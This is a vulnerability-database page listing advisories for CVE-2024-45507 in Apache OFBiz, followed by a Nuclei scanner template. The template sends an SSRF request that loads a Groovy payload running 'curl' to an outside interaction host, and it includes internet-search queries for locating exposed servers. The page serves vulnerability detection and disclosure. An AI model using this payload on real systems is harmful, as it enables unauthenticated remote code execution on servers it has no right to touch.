| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| Apache OFBiz < 18.12.16 Multiple Vulnerabilities | 13 Sep 202400:00 | – | nessus | |
| The vulnerability of the Apache OFBiz resource planning software lies in the insufficient validation of incoming requests, allowing a hacker to execute an SSRF attack. | 11 Sep 202400:00 | – | bdu_fstec | |
| CVE-2024-45507 | 4 Sep 202411:53 | – | circl | |
| Apache OFBiz 代码问题漏洞 | 4 Sep 202400:00 | – | cnnvd | |
| Apache OFBiz Code Execution Vulnerability (CNVD-2024-39150) | 4 Sep 202400:00 | – | cnvd | |
| CVE-2024-45507 | 4 Sep 202408:08 | – | cve | |
| CVE-2024-45507 Apache OFBiz: Prevent use of URLs in files when loading them from Java or Groovy, leading to a RCE | 4 Sep 202408:08 | – | cvelist | |
| CVE-2024-45507 | 4 Sep 202409:15 | – | nvd | |
| PT-2024-5990 | 14 Aug 202400:00 | – | ptsecurity | |
| CVE-2024-45507 | 23 May 202508:07 | – | redhatcve |
id: CVE-2024-45507
info:
name: Apache OFBiz - Remote Code Execution
author: chybeta,iamnooob,rootxharsh,pdresearch
severity: critical
description: |
Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server
impact: |
Unauthenticated attackers can exploit missing view authorization checks to execute arbitrary code on Apache OFBiz servers.
remediation: |
Users are recommended to upgrade to version 18.12.16, which fixes the issue.
reference:
- https://xz.aliyun.com/t/15569
- https://x.com/chybeta/status/1833184898913636424
- https://lists.apache.org/thread/o90dd9lbk1hh3t2557t2y2qvrh92p7wy
- https://ofbiz.apache.org/download.html
- https://github.com/advisories/GHSA-w8w4-463p-8pg7
- https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2024-45507
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-45507
cwe-id: CWE-918
epss-score: 0.93243
epss-percentile: 0.99821
cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
metadata:
vendor: apache
product: ofbiz
shodan-query:
- ofbiz.visitor=
- http.html:"ofbiz"
fofa-query:
- app="apache_ofbiz"
- body="ofbiz"
tags: cve,cve2024,apache,obiz,rce,oast,vkev,vuln
variables:
oast: "{{interactsh-url}}"
xml: '<?xml version="1.0" encoding="UTF-8"?><screens xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://ofbiz.apache.org/Widget-Screen" xsi:schemaLocation="http://ofbiz.apache.org/Widget-Screen http://ofbiz.apache.org/dtds/widget-screen.xsd"><screen name="StatsDecorator"><section><actions><set value="${groovy:''curl {{oast}}''.execute();}"/></actions></section></screen></screens>'
http:
- raw:
- |
POST /webtools/control/view/StatsSinceStart HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
statsDecoratorLocation=http%3a//oast.fun/x%3fb64_body%3d{{urlencode(urlencode(base64(xml)))}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- "StatsScreens"
# digest: 4b0a00483046022100c2a1be70deec34f7d3a5ef0c58771bab502c01d25bcbcc958d01f312f21498a5022100ba0fdb972d8aa970ac9f6244b21e6bde0353694c46f1556d59002d5fd1d8d8db:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation